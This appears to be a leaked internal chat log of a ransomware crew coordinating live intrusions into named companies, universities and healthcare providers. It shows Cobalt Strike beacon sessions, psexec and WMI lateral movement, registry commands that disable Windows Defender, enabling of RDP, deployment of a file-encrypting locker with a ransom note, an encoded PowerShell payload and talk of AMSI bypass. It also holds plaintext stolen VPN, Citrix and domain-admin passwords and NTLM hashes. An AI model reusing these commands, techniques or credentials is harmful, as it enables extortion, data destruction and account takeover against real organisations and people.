new password at least 30 characters, including letters, digits and symbols
@user4's network is almost worked through, we need to finish it today. 2 people will be assigned to help him, the network is pretty big
so most likely sessions are expected today
check the OS power settings right away so it doesn't go to sleep
then 10
it won't be there in a month
I'm on the old one
2 more people?
sent 3,7,8
can I keep the one I have
well, let it be 10
any
16 for me
everyone's here
write which dedicated server you want (10,16), I give you access in DM, you set it up for yourself, install software and change the account password, send me the new account password, I make you a snapshot of the current state so you can roll back to the configured environment
everyone's here already
actually, let's not wait
we'll wait another 7 minutes for the rest
this one, yes
199.241.189.58 seems alive - that's the one I mean
your main ones that you were originally given remain
already took back the 2 temporary ones I issued
the one that's already there, can I keep it?
3 win 10 and 3 win 16
the RDPs have arrived
not yet
everyone here?
hi
good day
hi all
:space_invader:
+ did you dump kerb from them?)
then another question: can I have the AD trust files for a start?
I've definitely started liking how you write your work report)
in the trusted domains, via `smb_version rhosts="имя_домена"`, we found a few more boxes than 1
Here `mcklrh.mig`:
```
[+] 192.168.254.92:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:RADDC01) (domain:MCKLRH)
[+] 192.168.254.93:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:RADDC02) (domain:MCKLRH)
[+] 192.168.254.107:445 - Host is running Windows 2003 R2 SP1 (build:3790) (name:NSERV4) (domain:MCKLRH)
```
Here `ffmg.local`:
```
[+] 10.10.39.73:445 - Host is running Windows 2003 SP2 (build:3790) (name:CLINICDC) (domain:FFMG)
```
The EA we have (`svc-aadc`) doesn't have admin rights in
either domain
Checked for `ms17`:
Here `ffmg.local` is dead
Here `mcklrh.mig` on the 2003 server the vulnerability is there.
Added an LA; couldn't spawn in cob, tpsh, or meterpreter.
Tried to dump ADinfo - didn't work. It gave either 0 objects, hung, or errored with `ERROR: 0x1`
Tried dumping both by dropping the exe and remotely via:
```
-b DC=mcklrh,DC=mig -h 192.168.254.107
```
Ran payloads via `wmic`, `psexec`, `ms17_010_command` - nothing at all
So far I only have the DA and EA lists from the `mcklrh.mig` domain
```
The request will be processed at a domain controller for domain mcklrh.mig.
Group name     Domain Admins
Comment        Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator            klr                      test3
testpacs
The command completed successfully.
```
```
The request will be processed at a domain controller for domain mcklrh.mig.
Group name     Enterprise Admins
Comment        Designated administrators of the enterprise
Members
-------------------------------------------------------------------------------
Administrator            ali
The command completed successfully.
```
`adfind.exe -f "(objectcategory=person)" -h x.x.x> ad_users.txt`
:thumbsup:
so you don't get bored
this is in case of failure on the current networks
user4
user7
I'll move it here for convenience
looks like passwords are being passed in zoom
from the 26th to the 5th
actually it was planned until 5 today
from what date? until what date do we rest?
let's try and close it, I already want the New Year holidays)
we're unlikely to close it even tomorrow))
still collecting info on all this.
then tomorrow
symantec on the server with authorization; no sessions with symantec open
unlikely to close 10 domains today + need to catch AV and vSphere creds somewhere...
https://www.solarwinds.com/it-security-management-tools
it's not AV at all, is it...?
.
nasty thing?
quite
does solarwinds mean anything?
left: backups\vsphere
it's written right there
how are things here?
170.7.120.128
for now it looks like this + this is the domain we're in
TECHNISTONE.LOCAL - can't get in, no intersections and no users\groups from other domains with rights
WI.RWP.COM is some dead domain, nothing but win 2003
```
WILSONART.COM +
CN.WILSONART.COM +
RALPHWILSON.COM +
ARBORITE.COM +
POLYREY.NET +
EU.WILSONART.COM +
UK.WILSONART.COM +
BUSHBOARD.CO.UK +
SLF.LOCAL +
RESOPAL.LAN +
TECHNISTONE.LOCAL no intersections
WI.RWP.COM 2003 mb old/inactive domain
POLYREY.COM Quarantined
RESOPAL.GER Quarantined
```
lists of servers/workstations from all domains.
Herbst2018
send the hash
```
c51ecc215ab741ba8eb53c323bc8c277
```
.
```
beacon> shell ping polyrey.com
[*] Tasked beacon to run: ping polyrey.com
[+] host called home, sent: 47 bytes
[+] received output:
Ping request could not find host polyrey.com. Please check the name and try again.
```
```
beacon> shell ping resopal.ger
[*] Tasked beacon to run: ping resopal.ger
[+] host called home, sent: 63 bytes
[+] received output:
Ping request could not find host resopal.ger. Please check the name and try again.
```
then the option with scanners
basically they die fast
well, nothing was closed in them
or after a couple of days with the listener up
they count as new before you close the network in it
that happens when the databases update fast
the reason I raised a fuss: yesterday there were two new cobs and nothing flew into those two new cobs
you don't say)
so, is it flying into the new cob)
with the commands and the rest
also give the sysinfo of that server behind the DC and whether it has external access))
yeah, two cobs were open, I picked https, and it was from the other cob)
to the other cob, or what?)
which one did you build on?)
your listeners column is empty
carelessness, so to speak
just so you know, that's me))
which listener did you bring it up on?)
` *** 23623423 has joined.`
I'm stunned too)
lol)
the one behind the DC was 2016
did anyone even bring up a new listener in the new one?
the one behind the DC, also 12?
dll from the new cob - same thing
both ways
but you said you ran it on 1 server inside the network via the DC?
not visible from the head one, visible from the other
we ran it on the DC
yes
`resopal.lan`
```
beacon> shell dir \\172.22.198.11\C$
[*] Tasked beacon to run: dir \\172.22.198.11\C$
[+] host called home, sent: 53 bytes
[+] received output:
The trust relationship between the primary domain and the trusted domain failed.
```
Or regsvr32 file.dll
Run: rundll32 file.dll, StartW
give the launch command for Dep's dll
where you ran it behind the DC, was that also 12?
yes
no server visible directly?
tried; the dll seemed to work on a server from this domain, but there was no session
get further through the DC?
it sees
external?
one guy sent it in #toolspanel yesterday
also give the sysinfo of these servers
I'm just testing, eliminating options)
I'll try of course, but purely my opinion) it's not the cob, it's that our dlls don't work on these 2012 DCs
try here
clean cob
none, only symantec
closing it means turning off AV everywhere via the admin console and walking in calmly; besides AV what is there? it doesn't show everything as AV, it could be a scanner or a sensor
how do we close it)
to get into the domain))
the option to fully disable AV is turned off everywhere
what do you need the session for?
though there's a risk the admins will see the agent drop
no rights
fully disable protection, pull it in via bind pipe and bring it back up?
but I noticed the dll crashes only on 2012
on the ones where it worked I added it to exclusions and ran it after the AV had gone through - the session came in
Dep's dll doesn't get deleted but crashes
our dll got detected, I added it to exclusions, it launches and crashes
after the AV went through it, in your view?
on some the dll launched after that and the session came in
I added the dll to the AV exclusions
as a result, a crash
most likely it detects the shellcode and cuts it out of the dll
logged in via rdp, launched the dll, a window popped up - program has stopped working....
how did you determine it's actually crashing?
but that's risky and then you need to finish everything right away
as an alternative, cut symantec (it's administered from the head domain) and try pulling the other domains via bind pipe
we need to solve this now, otherwise we won't close it today
anyway, here's the trust map
всего 14 доменов в 4 есть сесии в 7 есть доступы, но оттуда не летят сессии`` >description: Veeam Backup Server >dNSHostName: bod01-bkp01.eu.Wilsonart.com `````` >description: Vcenter Server >dNSHostName: bod01-vce01.eu.wilsonart.com `````` >description: Veeam Backup Server >dNSHostName: dcveeam01.Wilsonart.com `````` >description: VMware vCenter 6.0 Server >dNSHostName: dcwas79.Wilsonart.com ``` ``` >dNSHostName: nas_signature.polyrey.net ``осталось вцентер-насы-прочееиз текущего домена ДА +/- проходит в остальныеостальное все готово?чуть позже решим вопросрубит симантекбилдпайп?и везде крашитсятам стоит 2012на всех дк что видны из 5 доменовна всех 2012?@tl1 наши дл крашатся на 2012 винде, включаю вчерашню от дэпаав не видит ихещё есть WI.RWP.COM, там вобще всё на 2003и арборайткрашится процес после запуска дллна uk и eu ДК на 2012, там чистые длки при запуске падаютсесии не тянутсявсё, что _NTLM, снималось удалённо, кроме wilsonart.comпара вроде в карантине, но пингуетсявсе куда надо пролезтьэто все активные?`` uk.Wilsonart.com arborite.com eu.Wilsonart.com resopal.lan polyrey.com resopal.ger ``переходим на закрытиеpth polyrey.net\adm-cavailj 99f09cbd168ec7f38bf4981a884f082cВзаимновсем хороших выходыхв пн к часуфайлы удаляйтесеси в слиптак ну ладновполне стоит попробовать*вполнестоит пытаться мсф пробовать? разные нагрузки, порты спрашиваю вдруг если что, время не тратить)@user3 уже несколько дней в нее долбитсяона сидит рядом с тобойестьа инфы как я понял по тпш нет?:#sisd-net оставим в другой деньсегодня до 12:skull:поэтому она уже сдохла)там отстук должен быть до 40 секунд11 минут пингнижнятам что типо ACADEMIC.NET должно бытьне вижу там твоюв тпш прилетела к user3 а что дальше то с ней делать?) 
how do I spawn it into cobalt?
from user (
it came to me in ptsh from user 9
trying
Armitage?
no other options?
then most likely it's the port
no, it's not aggressive
McAfee
I'll try there too
which AV?
there are a couple more RDPs here now
:disappointed:
no
nope
launched
launch
ptsh
apparently AV cuts it; tried different variants of the cobalt payload - the session doesn't come in. are there any other ways to get a session?
or AV cuts the connection
as an option - there's an IP whitelist on the TCP connection there
the cobalt IP pings
but the process hangs and there's no session
in short, to sum up: outbound traffic on port 443 is closed there
yes) I didn't check..
copied from a Russian-language resource?
yes, and I see there ?????? 443 ?????????????dir=IN
localport 443 action=allow dir=IN
you're using a firewall rule
and if it comes to that
if it's not there, then the software on your box has nothing keeping 443 open
most likely there was a web server
if netstat showed local port 443 open
well, 139, 445 etc.
i.e. it just shows open ports
the -a flag matters more here
netstat -n
no way, I assumed; it's not in netstat
how did you determine that 443 is closed?
go on
no)
is the question about the busy port still relevant?
in other words the current box makes a request from port 57431 to 172....195:443
on the right is the remote address + port
as you see, on the left is the local address and port
this is the netstat header
```
Active Connections
Proto Local Address Foreign Address State
```
?
so the port is busy
not
your cobalt's?
ip
external
ip 172.
what's this?
Read it
read the last 30 messages
no, well, we need to change the port or redirect; a session on 443 in theory shouldn't come in
To what?
everyone answered?
yes
everyone here?
SMB link
445
over SMB too, then
I haven't tried, but I think you can bring up a session on 80
I've got a pod, I'm a zoomer after all
you don't smoke?
okay, I'll wait for everyone
they're smoking
more no than yes
will they be long?
I'm in the office and I can see they're not here
everyone's status shows "online" for me
some stepped away for now
@user8 answers for everyone?
won't come in
this one
or this one
this one
which one of them?
having trouble answering the question?
seems so for now
@user4 @user7 @user8 alive?
```
Please tell me - if port 443 is closed, will the session not come into cobalt?
```
+ screenshot below
I'll quote it
question to everyone above
there are 2 people on our team)
not ours; the domains are https and the port specified is 443, so the question is rather what to do about it if the port is closed)
which one?
@all a question for you
Please tell me - if port 443 is closed, will the session not come into cobalt?
`DJIFH*U(7g86S7eyiuhfsleg`
I'll issue a new one
```
https://lab.devry.edu/vpn/index.html D41111543 Carolann#05302009
https://lab.devry.edu/vpn/index.html d40016842 Jackson3
https://lab.devry.edu/vpn/index.html d01677853 Lilly535
https://lab.devry.edu/vpn/index.html d01480444 aDv!9659
```
@user9 additionally
yep
will you take 2 into work?
yes
and in general, if there are more networks - I can take some
```
https://vpn.floridapoly.edu
```
Scanning the subnets looking for DCs - to check for zerologon
so, everyone write in the groups what you're working on
no
In ptsh can you push exes into memory like in cobalt?
I still have problems with the dedi - no
+
+?
everyone has work
*yes
Everyone here?
hi
hi all
good afternoon
:space_invader:
with files like these it'll take forever lol
172.17.0.13 172.17.0.8
```
The network path was not found.
```
```
Lost = 4 (100% loss),
```
it'll take a long time
yes it should, some of the mapped drives are in China lol
dragging files over the network to encrypt them will take a long time
check whether the locker process died
it should in theory
will it definitely process the mapped ones on its own?
```
beacon> remote-exec psexec 10.10.20.131 C:\starter.exe
[*] Tasked beacon to run 'C:\starter.exe' on 10.10.20.131 via Service Control Manager
[+] host called home, sent: 2005 bytes
[-] Could not start service c122355 on 10.10.20.131: 5
```
+
on 1, i.e. on 1 mapped one?
somehow in the last half hour it only finished on 1 for me
and we can go
on the servers it's there
+
and on all servers)
well, now we wait for the note to appear on all mapped ones
the R3ADM3.txt file is on all the servers?
turns out so
that's it
quiet on the mapped ones so far
+
fine
the rest?
that
got it
yes, damn it
got it
got it
```
10/21/2020 10:01 PM 717 R3ADM3.txt
```
13
it just seems you attached more than 10, it might not go
try launching the build
if everything connected
the others don't map
no drives other than C anywhere?
mine too +
```
beacon> shell net use
[*] Tasked beacon to run: net use
[+] host called home, sent: 38 bytes
[+] received output:
New connections will be remembered.

Status       Local     Remote                    Network
-------------------------------------------------------------------------------
OK           N:        \\172.17.0.13\C$          Microsoft Windows Network
OK           O:        \\10.10.0.129\C$          Microsoft Windows Network
OK           P:        \\10.0.10.143\C$          Microsoft Windows Network
OK           Q:        \\10.0.10.83\C$           Microsoft Windows Network
OK           R:        \\10.0.10.163\C$          Microsoft Windows Network
OK           S:        \\10.0.10.129\C$          Microsoft Windows Network
OK           T:        \\172.17.0.8\C$           Microsoft Windows Network
OK           U:        \\10.10.20.126\C$         Microsoft Windows Network
OK           V:        \\10.0.10.111\C$          Microsoft Windows Network
OK           W:        \\10.10.20.131\C$         Microsoft Windows Network
OK           X:        \\10.10.0.135\C$          Microsoft Windows Network
OK           Y:        \\10.10.0.117\C$          Microsoft Windows Network
OK           Z:        \\10.0.10.116\C$          Microsoft Windows Network
The command completed successfully.
```
```
10.0.10.116
10.10.0.117
10.10.0.135
10.10.20.131
10.0.10.111
10.10.20.126
10.0.10.126
172.17.0.8
10.0.10.129
10.0.10.163
10.0.10.93
10.0.10.83
10.10.0.103
10.0.20.100
10.0.10.143
10.10.0.129
10.0.10.9
172.17.0.13
```
+
and that's all of them
10 each
you can just map them to the current 5 servers
```
10.0.0.25
10.0.20.222
10.10.0.118
10.0.10.131
10.0.0.24
10.0.10.103
10.0.10.96
10.0.10.101
10.0.10.134
10.10.0.131
10.0.10.133
10.0.10.35
10.0.20.231
10.0.20.83
10.10.0.134
10.0.10.168
```
49
and how many workstations are there?
We spread starters into system32 on all the workstations
at least there'll be some coverage on the workstations
even net use on the remaining 5 servers
and then we finish off the DCs
and then run the classic deploy on all PCs via psexec
there are no more than 10 active connections there as far as I remember
take part of the workstations via net use into this server
10.0.0.7
it's red in cobalt
one we didn't touch
+
on the servers
*did it start everywhere?
that's it, finish them off?
4 DCs we didn't touch + 1 server
where we can attach the ones that didn't start
leave the DCs + 1 server for the end
yeah, fine
on the servers it seems to have gone
```
 Size     Type     Last Modified         Name
 ----     ----     -------------         ----
          dir      10/13/2020 11:03:20   $Recycle.Bin
          dir      10/21/2020 21:30:41   Config.Msi
          dir      10/21/2020 21:30:40   Deskinfo
          dir      07/14/2009 01:06:44   Documents and Settings
          dir      10/21/2020 21:30:41   ECI
          dir      10/21/2020 21:30:41   Godlan
          dir      10/21/2020 21:30:40   inetpub
          dir      10/21/2020 21:30:41   MultiLink
          dir      10/21/2020 21:30:40   PerfLogs
          dir      10/21/2020 21:30:41   Program Files
          dir      10/21/2020 21:30:41   Program Files (x86)
          dir      10/21/2020 21:30:41   ProgramData
          dir      10/21/2020 21:30:40   Projects
          dir      10/21/2020 21:30:45   RDL
          dir      10/21/2020 21:30:40   Recovery
          dir      10/21/2020 21:30:40   SmartSystems
          dir      10/21/2020 21:30:40   SQL_Docs
          dir      07/11/2014 13:15:08   SSTemp
          dir      09/03/2018 21:01:40   System Volume Information
          dir      10/21/2020 21:30:45   Users
          dir      10/16/2020 13:56:57   Windows
 1kb      fil      10/21/2020 21:30:40   .rnd.GQQNX
 13kb     file     10/21/2020 21:30:40   Datacollectors.db.GQQNX
 1mb      file     10/21/2020 21:30:41   Infor803ERPInstall.log.GQQNX
 0b       file     11/27/2018 22:17:27   Inventory.db
 1kb      file     10/21/2020 21:30:41   MAPICSCDInstall.log.GQQNX
 680b     thread   10/21/2020 21:30:40   mode.txt.GQQNX
 21gb     file     10/16/2020 18:20:56   pagefile.sys
 717b     file     10/21/2020 21:30:40   R3ADM3.txt
 185kb    file     10/21/2020 21:30:27   starter.exe
 4kb      file     10/21/2020 21:30:40   VSM000.IDX.GQQNX
```
then we continue
okay-no
and no trusts?
didn't check either
didn't want to risk it)
on the other servers it doesn't start either for some reason?
20 servers, 18 alive, 4 of them DCs
in cobalt
all pulled in
how many servers and workstations are there here?
such instances happen, and the solution is actually above)
ah, well, logical)
and that's it
all its drives
map it to a server where there's no such thing
```
C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
ERROR: Access is denied.

C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
ERROR: Access is denied.

C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
ERROR: Access is denied
```
or can we just not touch the workstations at all?
well ok, on one server the branches are protected apparently
so if there's WL there it won't work anywhere
under a DA token you don't even need to mount anything)
we specify a list of paths
flag
via the -p flag
we just take from the servers under a DA token
and why run it on the workstations at all? if it started on the servers - that's enough
and we check there
we take 3 more workstations selectively
```
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com

[+] received output:
The system cannot find the file specified.
Connecting to 10.0.20.222...
Starting PSEXESVC service on 10.0.20.222...
Connecting with PsExec service on 10.0.20.222...
Starting C:\starter.exe on 10.0.20.222...
PsExec could not start C:\starter.exe on 10.0.20.222:
```
```
beacon> portscan 10.0.20.222 3389 none
[*] Tasked beacon to scan ports 3389 on 10.0.20.222
[+] host called home, sent: 93245 bytes
[+] received output:
Scanner module is complete
```
RDP should turn on, I think...
```
[*] Tasked beacon to run: wmic /namespace:\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
[Tasked beacon to run: wmic /namespace:\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1
[Tasked beacon to run: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
[+] host called home, sent: 472 bytes
[+] received output:
The operation completed successfully.
```
won't let it
same
same
```
* Username : egl_admin
* Domain   : ITC
* Password : E@gle@x1s3030
```
it just doesn't want to connect on the PC
without the account
left the old one for egl_admin
we changed the DA passwords
and under whom are you?
doesn't connect
didn't work?
if it doesn't work then there's WL on the workstations
@user9 try launching the exe from the root via psexec
trying
trying
also try getting in via RDP under DA
and it won't let me in here
```
beacon> shell c:\explorer.exe
[*] Tasked beacon to run: c:\explorer.exe
[+] host called home, sent: 46 bytes
[+] received output:
Access is denied.
```
I'll fly in now
I also think there's something like that
maybe application whitelisting?
```
shell starter.exe
[*] Tasked beacon to run: starter.exe
[+] host called home, sent: 42 bytes
[+] received output:
Access is denied.
```
this is from the root
try via RDP
some blatant nonsense
```
beacon> shell WINDOWSSystem32.exe
[*] Tasked beacon to run: WINDOWSSystem32.exe
[+] host called home, sent: 50 bytes
[+] received output:
Access is denied.

beacon> pwd
[*] Tasked beacon to print working directory
[+] host called home, sent: 8 bytes
[*] Current directory is C:\

beacon> whoami
[Unknown command: whoami
beacon> shell whoami
[*] Tasked beacon to run: whoami
[+] host called home, sent: 37 bytes
[+] received output:
nt authority\system
```
root of C, test please
folder
no AV shows up in the ps list
try the root of drive C
also says access denied
try another folder
turned off lockapp
and it doesn't delete, it blocks the launch
well, on the servers we killed windef with a batch file btw
```
beacon> shell dir 1.exe
[*] Tasked beacon to run: dir 1.exe
[+] host called home, sent: 40 bytes
[+] received output:
 Volume in drive C is OS
 Volume Serial Number is D85B-9A4C

 Directory of C:\WINDOWS\System32

10/21/2020  09:02 PM           189,440 1.exe
               1 File(s)        189,440 bytes
               0 Dir(s)  190,692,196,352 bytes free
```
```
beacon> shell 1.exe
[*] Tasked beacon to run: 1.exe
[+] host called home, sent: 36 bytes
[+] received output:
Access is denied.
```
so it's being killed.....
webroot
if I turn windef off then by logic
got in with a regular jump
if you log in under a domain admin on the DC
btw windef seems to be off
like this it'll go fine with RDP
```
For /f "tokens=*" %%a in (c:\tmp\ComputerList.txt) Do psexec \\%a -i gpupdate
```
or didn't give it /force
but the point is either psexec passed it all the parameters after the program name
I can sort of see it hanging in the processes there
both with explicit specification and without
and under a token
tried different ways
and why all this at all? why not launch it under a token?
no?
```
shell PsExec \\10.0.20.222 -d -s -h gpupdate /force -accepteula -y -u itc.local\egl_admin -p E@gle@x1s3030
```
that worked, didn't it
aren't these parameters of gpupdate itself?
```
gpupdate /force -accepteula -y -u itc.local\egl_admin -p E@gle@x1s3030
```
a screwup, in my opinion
```
gpupdate.exe 12492 Services 0 4,424 K NT AUTHORITY\SYSTEM 0:00:00
```
```
beacon> shell PsExec \\10.0.20.222 -d -s -h gpupdate /force -accepteula -y -u itc.local\egl_admin -p E@gle@x1s3030
[*] Tasked beacon to run: PsExec \\10.0.20.222 -d -s -h gpupdate /force -accepteula -y -u itc.local\egl_admin -p E@gle@x1s3030
[+] host called home, sent: 131 bytes
[+] received output:

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com

[+] received output:
Connecting to 10.0.20.222...
Starting PSEXESVC service on 10.0.20.222...
Connecting with PsExec service on 10.0.20.222...
Starting gpupdate on 10.0.20.222...
gpupdate started on 10.0.20.222 with process ID 46196.
```
blocks the launch
10.0.20.222
give me the IP of a workstation
+
the AV is webroot and that's it?
but it still won't let it
the batch file ran to disable windef
tried launching the starter on a couple of workstations - it won't let it
lock the servers; workstations can be done via mounts - there are almost never processes there holding important files
+ went over them with the batch file to disable windef
on the servers it seems to have turned off
and then the DCs
then everything else
priority on the servers
because on the client machines the firewall rules for remote management aren't enabled
on all machines
shell PsExec \\* -d -s -h
there's an error there
and why psexec?
this is the DC
and why aren't you updating GPO from the DC?
```
beacon> shell PsExec \\* -d -s -h gpupdate /force -accepteula -y -u itc.local\egl_admin -p E@gle@x1s3030
[*] Tasked beacon to run: PsExec \\* -d -s -h gpupdate /force -accepteula -y -u itc.local\egl_admin -p E@gle@x1s3030
[+] host called home, sent: 121 bytes
[+] received output:

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com

Enumerating domain...
A system error has occurred: 2184
```
cobalt crashes
the yellow one
don't go into interact with ITC-DC-SVR01 there
there's my damned stinky one
also give me access to the cobalt where you're doing it
yes
I'll just reboot now
or I can give more VPNs
we can look now at which ones are needed(
there was no second one(
the patient
it's mentioned in the note as the identifier
there's "code" in the build name
no, the filename in the archive
if so, here `SDIJ*FHg78SDFGTI&SDtARTE%YET`
you mean the archive password?
the value looks like this
```
uIYeJR0AY0hM9wCq0pK0S0fSgUFvquxwDi1Ieh3X093RPVdLcow9OB4lOmLDzISp
```
guys, don't you remember what the locker build code was here?
yep, doesn't see it
if it returns - it doesn't see it in 99 percent of cases
if it returns a result - the machine sees the DC
can do
shell net group "domain admins" /dom
the machine wasn't disconnected from the domain at the moment this script ran?
`Success! Username: SBolley.
Password: thisduckingsucks!02`работаеместь сессиитут у нас на чем затык?user9окк 12предлагаю пораньше и пораньше закончитьЗавтра кокольки?До завтравсем покавсем спасибои идем домойсеси в слипв сессиях за собой удалите файлыsisd.net снят АД. ЛА нет. Ищу где текущий пользак админ в подсетях из subnetsспасибодругое делоУ меня ничего, затра попробую остальные нагрузки и работу через ps` https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx` в `https://paloca.cernerworks.com/citrix/prodweb/ dr1434 dr14349773` yt pfgecnbnm cmd and ps`sharecare.com` - ошибка при логине в цитрикс `mch1.org` - нет доступов вобще никуда кроме медицинского приложения, в котором невозможно ввести логин и пароль `protransport.cloud.com` - доступ есть только к приложению по грузо-перевозке, входные данные к нему не подходят `unf.edu `- сейчас в работе, сняты адинфо, ДА, ДК, кербы переданы тл2, снят список шар, сейчас проходка по сети и съём мимика+хэшдампане дает подлкючится с ip дедика ``` https://login.medimizer.net/rdweb/pages/en-us/login.aspx ``` ситрикс никуда не ведет кроме админок сайтов, впн тунель на дедике есть но компов в сети не видно ``` https://liveopsnation.okta.com/app/citrixnetscalergateway_saml/exk25j1wbvpyk8bfl2p7/sso/saml ``` в работе - о прогрессе писал в конфе в двцух словах никуда не получилось двинуться, мало пк сейчас стоит расскан по /16 на 445 ``` https://mcloud.mgrmedu.com/rdweb/pages/en-us/login.aspx laci.riley@mgrmedu.com ``oasispetroleum.comничего не запустить, закрыто админом cmd adm psребята, пожалуйста, пишите о каком домене речь и что не так или так и не понял как мне элевейт кит попробовать через ту тулзу, завтра попробую через дэдик всё сделатьтут`` https://paloca.cernerworks.com/citrix/prodweb/ dr14349773 ```в первом что не так было?@user3 у меня на тебя 2 доступа записаноУ меня ничего, затра попробую остальные нагрузки и работу через psгде что не пошло и какой прогресSISD.NET - продолжаю `сканю подсетки из сабнетс - ищу ге пользак админ`прям 
по всемотпиши по всем своим текущим доступам которые бралитак ну чтоя бы для начала все равно снял ад, керб, шарпфайндер. текущий тул позволяет если АВ не сильно кусачийчекну8443 порт ещетолько хотел про него написать)rev_tcp_rc4 очень неплох от мсфаЧекал разные портыrev_tcp rev_http rev_https 80/443/53я бы поигрался с листенерами и портамида думаю тут проверить в кобу и в арму 2 нагрузки и можно понять что не тянется)не однократно прокатывало сессии в армитажад инфо выгрузитьнадо было работать в текущих условиях, снять керб и т десли не пустило чистую длл значит блочит именно трафиктак там дело не в нагрузкахПробовал запустить разные нагрузки. Не задалосьдо 11 работаем, в 11 итоги мин на 10 и по домамв 11 сворачиваемсяотпиште в групы что сделалипиши плиз в конфу где проблемы[ ](https://mediaeveryone.com/channel/general?msg=GBuGjFSkRq2fukyFx) вообщем с моей сессией печально запускаю какой-нибуль тул - он отрабатывает и сессия отлетаета на других нетзапускал - пишет что на той машине где я есть доступ к админским шарам, но прав у него нет почему тошейрфайндер запускали? 
проверяли может пользак имет права админа на другие машины просто ?у меня с mgrmedu.com пока нет подвижек пользак не ла - права не получается поднять лажу по сети + сессии постоянно отлетают - ав рубитпроверил сканнером мс17 единственный живой сервак 2008 - глухо снял кербы с трастов и передал тл2 думаю чем подниматьсяпытаюсь систему получитькакие результаты у вас?она грязнее чем земля)даlfкобы?нагрузка чего?запускаю `https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx bbbwalkerj Colorblue76!` в cmd/ps нагрузку ``powershell -nop -w hidden -encodedcommand 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 ``` Процесс создается, но сессия не прилетаети амси байпас скрипт блочит как малварькак скрипт[ ](https://mediaeveryone.com/channel/general?msg=CdzqBnJxqPN8YbhkA) я пробовал, блочит ави еще, повторяю хз какой раз, удаляйте за собой тулы и любые свои файлы из системыинвок керберостом снимите если рубеус блокиреутпонялдальше уже от тебя зависит как будешь повышать их)у тебя есть весь гитхаб) возможность работы с cmd, загрузкой файлов и т док, а как через эту тулзу повышать привелегии?нет, получается заблочило запуск ехеесли файла нет, то и кербов получается нет, да?когда снимаете керб отсылайте его @tl2 и дублируйте в конфу@user7 в конфу пожалуйста@user9 конфу сделалспасибоготово@user4 продублируй плиз в конфу[ ](https://mediaeveryone.com/channel/general?msg=bHAEAFsYYCqokD8Bf) mgrmedu.comя, скинул тл2можно беседуя могу, зальёшь рубиускстатино не скинул ещеясовсем никто?ещё неткто-то снимал кербы?возьми один просто для себяу вас 4 дедика`` https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx bbbwalkerj Colorblue76! ``` вот требует старую весию ситрикца, я ее качаю и при установке мне говорит типа: Это не совсем новая версия? Поставь новей. 
Если я снесу новую которая стоит то парни не смогут юзатьшелкод в личкуОкновый шелкод билдер у @tl1 естьвот так пускается`` rundll32.exe C:\path\to\file\file.dll,entryPoint regsvr32.exe /s C:\path\to\file.dll ```вот ФУД`` ./shellConcatination --source=shellStarter_llvm_x64.dll --target=x64.dll --addBin=x64.bin -self -keep `````` Делаю криптором raw to exe сессия не прилетает. ``` ехе грязный, не делай его))Открылось...у меня было особщение что сайт не поддерживает tls 2.0или смени дедик на другой чисто проверить доступностьбрось его полностьюсвежий?лисакакой браузер юзаешь?там отображается страницада все окДелаю криптором raw to exe сессия не прилетает.С дедика не от крывает страницу https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx тупо весит белый экранто есть креды невалид?`` https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx bbbwalkerj Colorblue76! ``` С этим соединение не проходита тут?`` phoen1xasp.com `````` https://paloca.cernerworks.com/citrix/prodweb/ dr14349773 ``Не запустить cmd, powerShell, taskmgr все почекано админома то ты тише всех работаешькакой был в работе и почему нужна замена напишидаLfтебе надо?даесть еще что на замену?`` https://mcloud.mgrmedu.com/rdweb/pages/en-us/login.aspx laci.riley@mgrmedu.com MeduLR@1234 ``` @user9 заменадавайнет вебая могу тебе еще в работу дать доступы, там может быстрее работать чем тутчекни что там за вебне густону, так пусканул ``` beacon> portscan 172.0.0.1/24 21,22,23,25,53,80,81,110,119,137,139,143,443,445,465,587,993,995,1080,1194,1433,3306,3389,5500,5800,5900-5906,8080,9001,9030,9050,9051,9090,9091,9100 icmp 1024 [*] Tasked beacon to scan ports 21,22,23,25,53,80,81,110,119,137,139,143,443,445,465,587,993,995,1080,1194,1433,3306,3389,5500,5800,5900-5906,8080,9001,9030,9050,9051,9090,9091,9100 on 172.0.0.1/24 [+] host called home, sent: 93245 bytes [+] received output: (ICMP) Target '172.0.0.60' is alive. [read 8 bytes] [+] received output: (ICMP) Target '172.0.0.97' is alive. 
